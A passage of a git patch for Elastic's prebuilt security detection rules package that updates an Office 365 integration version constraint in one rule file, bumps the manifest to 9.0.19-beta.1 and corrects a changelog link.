b/packages/security_detection_engine/kibana/security_rule/ff4dd44a-0ac6-44c4-8609-3f81bc820f02_210.json index 48d799ad13f..1dbc11829c7 100644 --- a/packages/security_detection_engine/kibana/security_rule/ff4dd44a-0ac6-44c4-8609-3f81bc820f02_210.json +++ b/packages/security_detection_engine/kibana/security_rule/ff4dd44a-0ac6-44c4-8609-3f81bc820f02_210.json @@ -24,7 +24,7 @@ "related_integrations": [ { "package": "o365", - "version": "^2.11.0" + "version": "^3.0.0" } ], "required_fields": [ diff --git a/packages/security_detection_engine/manifest.yml b/packages/security_detection_engine/manifest.yml index ae50e09cdd7..98ac5f72b9b 100644 --- a/packages/security_detection_engine/manifest.yml +++ b/packages/security_detection_engine/manifest.yml @@ -22,4 +22,4 @@ source: license: Elastic-2.0 title: Prebuilt Security Detection Rules type: integration -version: 9.0.18 +version: 9.0.19-beta.1 From 7e7202cebea2fb14e3417ce7ead7438934d6df4c Mon Sep 17 00:00:00 2001 From: tradebot-elastic <178941316+tradebot-elastic@users.noreply.github.com> Date: Mon, 8 Dec 2025 19:22:13 +0000 Subject: [PATCH 2/2] Add changelog entry for 9.0.19-beta.1 --- packages/security_detection_engine/changelog.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/packages/security_detection_engine/changelog.yml b/packages/security_detection_engine/changelog.yml index faf1ff209e7..41949b9178f 100644 --- a/packages/security_detection_engine/changelog.yml +++ b/packages/security_detection_engine/changelog.yml @@ -4,7 +4,7 @@ changes: - description: Release security rules update type: enhancement - link: https://github.com/elastic/integrations/pulls/0000 + link: https://github.com/elastic/integrations/pull/16405 - version: 9.0.18 changes: - description: Release security rules update